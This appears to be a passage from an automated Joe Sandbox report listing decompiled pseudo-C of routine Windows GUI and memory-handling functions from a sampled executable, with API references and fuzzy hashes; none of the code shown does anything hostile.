                                            				_t23 = GlobalLock(_a4);
                                            				_t20 = _a8;
                                            				if(_t20 == 0) {
                                            					_t9 = 0;
                                            				} else {
                                            					_t9 = GlobalLock(_t20);
                                            				}
                                            				if(_t23 != 0) {
                                            					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
                                            					GlobalUnlock(_v12);
                                            					if(_t20 != 0) {
                                            						GlobalUnlock(_t20);
                                            					}
                                            					return _t22;
                                            				} else {
                                            					goto L5;
                                            				}
                                            			}









                                            APIs
                                            • GlobalLock.KERNEL32 ref: 00410332
                                            • GlobalLock.KERNEL32 ref: 0041033F
                                            • CreateDCA.GDI32(?,?,?,00000000), ref: 00410362
                                            • GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 00410374
                                            • GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 0041037B
                                            Similarity
                                            • API ID: Global$LockUnlock$Create
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00420766(void* __ecx) {
                                            				struct tagMSG _v28;
                                            				void* _t9;
                                            				void* _t13;
                                            				void* _t25;
                                            
                                            				_t25 = __ecx;
                                            				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                                            					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
                                            						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
                                            					}
                                            					if(GetCapture() ==  *(_t25 + 0x1c)) {
                                            						ReleaseCapture();
                                            					}
                                            					_t13 = E00414DCC(_t25);
                                            					 *((intOrPtr*)(_t25 + 0x50)) = 0;
                                            					 *((intOrPtr*)(_t13 + 0x50)) = 0;
                                            					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
                                            				}
                                            				return _t9;
                                            			}








                                            APIs
                                            Similarity
                                            • API ID: Message$CapturePost$PeekRelease
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00408E53() {
                                            				void _t10;
                                            				long _t15;
                                            				void* _t16;
                                            
                                            				_t15 = GetLastError();
                                            				_t16 = TlsGetValue( *0x436fb0);
                                            				if(_t16 == 0) {
                                            					_t16 = E00407333(1, 0x74);
                                            					if(_t16 == 0 || TlsSetValue( *0x436fb0, _t16) == 0) {
                                            						E00406490(0x10);
                                            					} else {
                                            						E00408E40(_t16);
                                            						_t10 = GetCurrentThreadId();
                                            						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                                            						 *_t16 = _t10;
                                            					}
                                            				}
                                            				SetLastError(_t15);
                                            				return _t16;
                                            			}







                                            APIs
                                            • GetLastError.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E55
                                            • TlsGetValue.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E63
                                            • SetLastError.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408EAF
                                              • Part of subcall function 00407333: HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388
                                            • TlsSetValue.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E87
                                            • GetCurrentThreadId.KERNEL32 ref: 00408E98
                                            Similarity
                                            • API ID: ErrorLastValue$AllocCurrentHeapThread
                                            • String ID:
                                            • API String ID: 2020098873-0
                                            • Opcode ID: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
                                            • Instruction ID: 621b0a22466fadbf8087ca8eaa5014453414117e276020d1f2dab8d9fe1528b5
                                            • Opcode Fuzzy Hash: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
                                            • Instruction Fuzzy Hash: 4FF0CD32A01612ABC3312B21FD0DA1F3B60EB01BA1715413EF985F62E0CF38980286EC
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 47%
                                            			E004239AC(struct tagRECT* _a4, long _a8, signed char _a10) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				int _t13;
                                            				int _t14;
                                            				intOrPtr _t16;
                                            				void* _t19;
                                            				struct tagRECT* _t21;
                                            
                                            				if( *0x439c44 != 0) {
                                            					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
                                            				}
                                            				if((_a8 & 0x00040600) == 0) {
                                            					_push(GetSystemMetrics(6));
                                            					_push(5);
                                            				} else {
                                            					_push(GetSystemMetrics(0x21));
                                            					_push(0x20);
                                            				}
                                            				_t13 = GetSystemMetrics();
                                            				_t21 = _a4;
                                            				_t14 = InflateRect(_t21, _t13, ??);
                                            				if((_a10 & 0x000000c0) != 0) {
                                            					E00422A19(_t19, _t21);
                                            					_t16 =  *0x439c9c; // 0x0
                                            					_t21->top = _t21->top - _t16;
                                            					return _t16;
                                            				}
                                            				return _t14;
                                            			}











                                            APIs
                                            • AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004239C6
                                            • GetSystemMetrics.USER32 ref: 004239DF
                                            • GetSystemMetrics.USER32 ref: 004239F3
                                            • InflateRect.USER32(?,00000000), ref: 004239FA
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MetricsRectSystem$AdjustInflateWindow
                                            • String ID:
                                            • API String ID: 4080371637-0
                                            • Opcode ID: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
                                            • Instruction ID: e5fc7e5830382d5c46746aa1a576b8dc40ee31b23e133811d6216470331d8181
                                            • Opcode Fuzzy Hash: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
                                            • Instruction Fuzzy Hash: 3DF0C831740328BBDB205F94BD09BAA3B68EF01711F848026BA496B1D0C7F85E91CFD9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004258D4(long* __ecx) {
                                            				long _t4;
                                            				intOrPtr _t5;
                                            				void* _t6;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            				long* _t15;
                                            
                                            				_t15 = __ecx;
                                            				_t4 =  *__ecx;
                                            				if(_t4 != 0xffffffff) {
                                            					TlsFree(_t4);
                                            				}
                                            				_t1 = _t15 + 0x14; // 0x4d1038
                                            				_t5 =  *_t1;
                                            				if(_t5 != 0) {
                                            					do {
                                            						_t14 =  *((intOrPtr*)(_t5 + 4));
                                            						E00425BA0(_t15, _t5, 0);
                                            						_t5 = _t14;
                                            					} while (_t14 != 0);
                                            				}
                                            				_t3 = _t15 + 0x10; // 0x4c0158
                                            				_t6 =  *_t3;
                                            				if(_t6 != 0) {
                                            					_t13 = GlobalHandle(_t6);
                                            					GlobalUnlock(_t13);
                                            					_t6 = GlobalFree(_t13);
                                            				}
                                            				DeleteCriticalSection(_t15 + 0x1c);
                                            				return _t6;
                                            			}










                                            APIs
                                            • TlsFree.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 004258E0
                                            • GlobalHandle.KERNEL32 ref: 00425908
                                            • GlobalUnlock.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 00425911
                                            • GlobalFree.KERNEL32 ref: 00425918
                                            • DeleteCriticalSection.KERNEL32(00439990,?,?,00425DE1,00000000,00000001), ref: 00425922
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                            • String ID:
                                            • API String ID: 2159622880-0
                                            • Opcode ID: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
                                            • Instruction ID: 9d5b72b6300baeafbca016f02161f8457eec0fc2b083dcd5d79a1fa835123fe9
                                            • Opcode Fuzzy Hash: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
                                            • Instruction Fuzzy Hash: 4AF05E31700A20DBC630AB39BC0CA2B77BDEF857207D5056AF811D3361DB78DC0686A8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00428BA1(void* __ecx) {
                                            				int _t22;
                                            
                                            				_t22 = SaveDC( *(__ecx + 8));
                                            				if( *(__ecx + 4) == 0) {
                                            					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
                                            				} else {
                                            					SelectObject( *(__ecx + 4), GetStockObject(0xd));
                                            					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
                                            					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
                                            				}
                                            				return _t22;
                                            			}





                                            APIs
                                            • SaveDC.GDI32(?), ref: 00428BAF
                                            • GetStockObject.GDI32(0000000D), ref: 00428BBC
                                            • SelectObject.GDI32(00000000,00000000), ref: 00428BCC
                                            • SaveDC.GDI32(00000000), ref: 00428BD1
                                            • SelectObject.GDI32(00000000,?), ref: 00428BDE
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Object$SaveSelect$Stock
                                            • String ID:
                                            • API String ID: 2785865535-0
                                            • Opcode ID: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
                                            • Instruction ID: 39288a4f9771774ee527ad7dc5e24ccfae81283b4a828b13e1b5aa3fcaf6deb1
                                            • Opcode Fuzzy Hash: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
                                            • Instruction Fuzzy Hash: 05F05871201708AFD7312F66EC44E2BBBA9EB44751B40453EE15682520DB72B816DFA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E0041C80F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				signed int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				struct tagRECT _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				struct tagRECT _v68;
                                            				intOrPtr _t173;
                                            				intOrPtr* _t174;
                                            				intOrPtr _t177;
                                            				signed char _t179;
                                            				intOrPtr* _t181;
                                            				signed char _t185;
                                            				signed int _t187;
                                            				signed int _t188;
                                            				intOrPtr* _t202;
                                            				signed int _t205;
                                            				signed int _t206;
                                            				signed int _t215;
                                            				signed int _t224;
                                            				intOrPtr* _t227;
                                            				intOrPtr* _t232;
                                            				intOrPtr _t233;
                                            				signed int _t250;
                                            				signed int _t252;
                                            				signed int _t256;
                                            				signed int _t260;
                                            				void* _t263;
                                            				signed int _t266;
                                            				signed int _t268;
                                            				intOrPtr _t272;
                                            				signed int _t275;
                                            				signed int _t279;
                                            
                                            				_t263 = __edx;
                                            				_t227 = __ecx;
                                            				_t266 = 0;
                                            				_push(0);
                                            				_push(0);
                                            				_push(0x418);
                                            				_v8 = 0;
                                            				_v52 = 0;
                                            				_v48 = 0;
                                            				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
                                            				_v28 = _t275;
                                            				if(_t275 != 0) {
                                            					_t177 = E004131DD(_t275 + _t275 * 4 << 2);
                                            					_v8 = _t177;
                                            					if(_t275 > 0) {
                                            						_v12 = _t177;
                                            						do {
                                            							E0041C295(_t227, _t266, _v12);
                                            							_v12 = _v12 + 0x14;
                                            							_t266 = _t266 + 1;
                                            						} while (_t266 < _t275);
                                            						_t268 = 0;
                                            						if(_t275 > 0) {
                                            							_t179 =  *(_t227 + 0x64);
                                            							if((_t179 & 0x00000002) == 0) {
                                            								_t256 = _t179 & 0x00000004;
                                            								_v44.bottom = _t256;
                                            								if(_t256 == 0) {
                                            									L19:
                                            									_push(_t268);
                                            									asm("sbb eax, eax");
                                            									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
                                            									__eflags = _t215;
                                            									_push(_t215);
                                            								} else {
                                            									if((_a8 & 0x00000004) != 0) {
                                            										L18:
                                            										_push(_t268);
                                            										_push( *((intOrPtr*)(_t227 + 0x54)));
                                            									} else {
                                            										if((_a8 & 0x00000008) == 0) {
                                            											__eflags = _a8 & 0x00000010;
                                            											if((_a8 & 0x00000010) == 0) {
                                            												__eflags = _a12 - 0xffffffff;
                                            												if(_a12 == 0xffffffff) {
                                            													__eflags = _t179 & 0x00000001;
                                            													if((_t179 & 0x00000001) == 0) {
                                            														goto L19;
                                            													} else {
                                            														goto L18;
                                            													}
                                            												} else {
                                            													SetRectEmpty( &_v44);
                                            													E0041F52D(_t227,  &_v44, _a8 & 0x00000002);
                                            													_t224 = _a8 & 0x00000020;
                                            													__eflags = _t224;
                                            													if(_t224 == 0) {
                                            														_t260 = _v44.right - _v44.left;
                                            														__eflags = _t260;
                                            													} else {
                                            														_t260 = _v44.bottom - _v44.top;
                                            													}
                                            													_push(_t224);
                                            													_push(_t260 + _a12);
                                            												}
                                            											} else {
                                            												_push(0);
                                            												_push(0);
                                            											}
                                            										} else {
                                            											_push(0);
                                            											_push(0x7fff);
                                            										}
                                            									}
                                            								}
                                            								_push(_t275);
                                            								_push(_v8);
                                            								E0041C6B2(_t227, _t263);
                                            							}
                                            							_push(_t275);
                                            							_push(_v8);
                                            							_push( &(_v44.right));
                                            							_t181 = E0041C4B6(_t227);
                                            							_v52 =  *_t181;
                                            							_v48 =  *((intOrPtr*)(_t181 + 4));
                                            							if((_a8 & 0x00000040) != 0) {
                                            								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
                                            								_v20 = _t268;
                                            								_v44.bottom =  *(_t227 + 0x84);
                                            								if(_t275 > 0) {
                                            									_t250 = _t275;
                                            									_t202 = _v8 + 4;
                                            									_v24 = _t202;
                                            									do {
                                            										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
                                            											_t268 = _t268 + 1;
                                            										}
                                            										_t202 = _t202 + 0x14;
                                            										_t250 = _t250 - 1;
                                            									} while (_t250 != 0);
                                            									if(_t268 > 0) {
                                            										_t205 = E004131DD(_t268 + _t268 * 2 << 3);
                                            										if(_t205 == 0) {
                                            											_t205 = 0;
                                            											__eflags = 0;
                                            										} else {
                                            											_a12 = _t268 - 1;
                                            										}
                                            										_v16 = _v16 & 0x00000000;
                                            										_a12 = _a12 & 0x00000000;
                                            										_v20 = _t205;
                                            										_t67 = _t205 + 8; // 0x8
                                            										_t272 = _t67;
                                            										_t206 = _v24;
                                            										_v12 = _t272;
                                            										_v24 = _t206;
                                            										do {
                                            											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
                                            												_t252 = _a12;
                                            												 *((intOrPtr*)(_t272 - 8)) = _t252;
                                            												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
                                            												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
                                            												E0041A32D(_t227,  &_v68);
                                            												_v16 = _v16 + 1;
                                            												asm("movsd");
                                            												asm("movsd");
                                            												_v12 = _v12 + 0x18;
                                            												_t206 = _v24;
                                            												asm("movsd");
                                            												asm("movsd");
                                            												_t275 = _v28;
                                            												_t272 = _v12;
                                            											}
                                            											_a12 = _a12 + 1;
                                            											_t206 = _t206 + 0x14;
                                            											_v24 = _t206;
                                            										} while (_a12 < _t275);
                                            										_t268 = _v16;
                                            									}
                                            								}
                                            								_t185 =  *(_t227 + 0x64);
                                            								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
                                            									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
                                            								}
                                            								_a12 = _a12 & 0x00000000;
                                            								_t308 = _t275;
                                            								if(_t275 > 0) {
                                            									_v16 = _v8;
                                            									do {
                                            										E0041C2B4(_t227, _t308, _a12, _v16);
                                            										_a12 = _a12 + 1;
                                            										_v16 = _v16 + 0x14;
                                            									} while (_a12 < _t275);
                                            								}
                                            								if(_t268 > 0) {
                                            									_t187 = _v20;
                                            									_v24 = _t268;
                                            									_t113 = _t187 + 8; // 0x8
                                            									_t279 = _t113;
                                            									_a12 = _t279;
                                            									do {
                                            										_t188 = E0041649C(_t227,  *((intOrPtr*)(_t279 - 4)));
                                            										_v28 = _t188;
                                            										if(_t188 != 0) {
                                            											GetWindowRect( *(_t188 + 0x1c),  &_v68);
                                            											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
                                            											E0041663D(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
                                            											_t279 = _a12;
                                            										}
                                            										_t279 = _t279 + 0x18;
                                            										_t130 =  &_v24;
                                            										 *_t130 = _v24 - 1;
                                            										_a12 = _t279;
                                            									} while ( *_t130 != 0);
                                            									E00413206(_v20);
                                            								}
                                            								 *(_t227 + 0x84) = _v44.bottom;
                                            							}
                                            							E00413206(_v8);
                                            						}
                                            					}
                                            				}
                                            				SetRectEmpty( &_v68);
                                            				E0041F52D(_t227,  &_v68, _a8 & 0x00000002);
                                            				_v48 = _v48 + _v68.top - _v68.bottom;
                                            				_v52 = _v52 + _v68.left - _v68.right;
                                            				_t232 = E0041E6BA( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
                                            				_t173 =  *_t232;
                                            				_t233 =  *((intOrPtr*)(_t232 + 4));
                                            				if(_v52 <= _t173) {
                                            					_v52 = _t173;
                                            				}
                                            				if(_v48 <= _t233) {
                                            					_v48 = _t233;
                                            				}
                                            				_t174 = _a4;
                                            				 *_t174 = _v52;
                                            				 *((intOrPtr*)(_t174 + 4)) = _v48;
                                            				return _t174;
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Empty$Window
                                            • String ID: @
                                            • API String ID: 444217639-2766056989
                                            • Opcode ID: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
                                            • Instruction ID: cf120915a9bc79257b06898680a609e4f39c2be92c1a3f6b3b2cd3709033a41d
                                            • Opcode Fuzzy Hash: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
                                            • Instruction Fuzzy Hash: 81C14771A40219AFCF15DFA8CC84AEEBBB5FF44354F04816AE815AB351D738AD81CB58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E00418A76() {
                                            				intOrPtr _t35;
                                            				void* _t38;
                                            				intOrPtr _t48;
                                            				intOrPtr _t49;
                                            				void* _t50;
                                            				void* _t64;
                                            				intOrPtr* _t74;
                                            				intOrPtr _t76;
                                            				intOrPtr _t77;
                                            				void* _t78;
                                            				intOrPtr _t90;
                                            
                                            				E00406520(E00429F80, _t78);
                                            				_t35 =  *0x436980; // 0x436994
                                            				_t55 =  *((intOrPtr*)(_t78 + 0x14));
                                            				 *((intOrPtr*)(_t78 - 0x10)) =  *((intOrPtr*)(_t78 + 0x14));
                                            				 *((intOrPtr*)(_t78 + 0x14)) = _t35;
                                            				_t74 =  *((intOrPtr*)(_t78 + 0xc));
                                            				 *(_t78 - 4) = 0;
                                            				if(_t74 == 0) {
                                            					L19:
                                            					if( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x14)) - 8)) == 0) {
                                            						_t90 =  *0x439c48; // 0x1
                                            						_push(0x104);
                                            						if(_t90 == 0) {
                                            							lstrcpynA(_t78 - 0x114,  *(_t78 + 8), ??);
                                            						} else {
                                            							_push(_t78 - 0x114);
                                            							_push( *(_t78 + 8));
                                            							E00417CBF();
                                            						}
                                            						E0041E3FA(_t78 + 0x14, _t55, _t78 - 0x114);
                                            					}
                                            					E0041BB46( *((intOrPtr*)(_t78 + 0x14)), 0x30,  *((intOrPtr*)(_t78 - 0x10)));
                                            					L25:
                                            					 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
                                            					_t38 = E00416AEC(_t78 + 0x14);
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
                                            					return _t38;
                                            				}
                                            				if(E00416753(_t74, 0x42d4d0) != 0) {
                                            					goto L25;
                                            				}
                                            				if(E00416753(_t74, ?str?) == 0) {
                                            					_t48 = E00416753(_t74, "H�B");
                                            					__eflags = _t48;
                                            					if(_t48 == 0) {
                                            						goto L19;
                                            					}
                                            					_t49 =  *((intOrPtr*)(_t74 + 0x10));
                                            					_t64 = _t74 + 0x10;
                                            					__eflags =  *((intOrPtr*)(_t49 - 8));
                                            					if( *((intOrPtr*)(_t49 - 8)) == 0) {
                                            						E00416BE5(_t64,  *(_t78 + 8));
                                            					}
                                            					_t50 = E00416CC1(_t78 + 0x14, _t78, 0xff);
                                            					__eflags =  *((intOrPtr*)( *_t74 + 0xc))(_t50, 0x100, _t78 - 0x10);
                                            					if(__eflags == 0) {
                                            						_t76 =  *((intOrPtr*)(_t74 + 8));
                                            						__eflags = _t76 - 2;
                                            						if(__eflags >= 0) {
                                            							__eflags = _t76 - 3;
                                            							if(__eflags <= 0) {
                                            								_t55 = 0xf121;
                                            							} else {
                                            								__eflags = _t76 - 5;
                                            								if(_t76 == 5) {
                                            									__eflags =  *((intOrPtr*)(_t78 + 0x10));
                                            									_t55 = (0 | __eflags != 0x00000000) + 0xf123;
                                            								} else {
                                            									__eflags = _t76 - 0xd;
                                            									if(__eflags == 0) {
                                            										_t55 = 0xf122;
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            					E00416D10(_t78 + 0x14, __eflags, 0xffffffff);
                                            				} else {
                                            					_t77 =  *((intOrPtr*)(_t74 + 8));
                                            					if(_t77 == 3 || _t77 > 4 && _t77 <= 7) {
                                            						_t55 = 0xf120;
                                            					}
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prologlstrcpyn
                                            • String ID: HB$pB
                                            • API String ID: 588646068-605489205
                                            • Opcode ID: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
                                            • Instruction ID: a9f5f5579fdfe236bfe92a05d823b87aef4f8825b77d1c3b985387d1bf5da384
                                            • Opcode Fuzzy Hash: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
                                            • Instruction Fuzzy Hash: EF419D71A0421A9BCF21EF55C8819EEB3A5EF04354F11412FF866A71E0EB38AD80CB5D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E00416FCD(void** __ecx, char* _a4, short _a8) {
                                            				signed int _v8;
                                            				void** _v12;
                                            				signed int _v16;
                                            				short* _v20;
                                            				short _v84;
                                            				signed int _t47;
                                            				signed int _t48;
                                            				void* _t61;
                                            				signed int* _t67;
                                            				void* _t75;
                                            				signed int _t81;
                                            				short* _t84;
                                            				signed int _t86;
                                            				signed int _t93;
                                            				void** _t94;
                                            				void* _t96;
                                            
                                            				_v12 = __ecx;
                                            				if(__ecx[1] != 0) {
                                            					_t67 = GlobalLock( *__ecx);
                                            					_t47 = _t67[0];
                                            					_v8 = 0 | _t47 == 0x0000ffff;
                                            					if(_t47 != 0xffff) {
                                            						_t48 =  *_t67;
                                            					} else {
                                            						_t48 = _t67[3];
                                            					}
                                            					asm("sbb esi, esi");
                                            					_v16 = _t48 & 0x00000040;
                                            					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
                                            					if(_v8 == 0) {
                                            						 *_t67 =  *_t67 | 0x00000040;
                                            					} else {
                                            						_t67[3] = _t67[3] | 0x00000040;
                                            					}
                                            					_a4 = _t93 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v84, 0x20) * 2;
                                            					_t84 = E00416E50(_t67);
                                            					_t75 = 0;
                                            					_v20 = _t84;
                                            					if(_v16 != 0) {
                                            						_t22 = E00406A48(_t84 + _t93) * 2; // 0x3
                                            						_t75 = _t93 + _t22 + 2;
                                            					}
                                            					_t26 = _t84 + 3; // 0x6
                                            					_t55 = _t75 + _t26 & 0x000000fc;
                                            					_v16 = _t75 + _t26 & 0x000000fc;
                                            					_t86 = _t84 +  &(_a4[3]) & 0xfffffffc;
                                            					if(_v8 == 0) {
                                            						_t81 = _t67[2];
                                            					} else {
                                            						_t81 = _t67[4];
                                            					}
                                            					if(_a4 != _t75 && _t81 > 0) {
                                            						E00405EA0(_t86, _t55, _t67 - _t55 + _v12[1]);
                                            						_t96 = _t96 + 0xc;
                                            					}
                                            					 *_v20 = _a8;
                                            					E00405EA0(_v20 + _t93,  &_v84, _a4 - _t93);
                                            					_t94 = _v12;
                                            					_t94[1] = _t94[1] + _t86 - _v16;
                                            					GlobalUnlock( *_t94);
                                            					_t94[2] = _t94[2] & 0x00000000;
                                            					_t61 = 1;
                                            					return _t61;
                                            				}
                                            				return 0;
                                            			}



















                                            APIs
                                            • GlobalLock.KERNEL32 ref: 00416FE9
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 0041703C
                                            • GlobalUnlock.KERNEL32(?), ref: 004170D3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Global$ByteCharLockMultiUnlockWide
                                            • String ID: System
                                            • API String ID: 231414890-3470857405
                                            • Opcode ID: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
                                            • Instruction ID: c2f8acceaa533c94d1390ef28e6fe5bddd73ae44c4aad8fbd6ca481d2bb84418
                                            • Opcode Fuzzy Hash: 1a9a31325cfa5bba34be76270e85657ed16da1fae0bf9ce6274e1f8cd34a53b2
                                            • Instruction Fuzzy Hash: 9741E872904305EFCB10DFA4C8859EF7BB5FF44354F50816AE815AB284D3399A86CB98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E004227B5(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                                            				intOrPtr _v8;
                                            				void* __ebp;
                                            				int _t42;
                                            				void* _t69;
                                            				intOrPtr _t71;
                                            				intOrPtr* _t74;
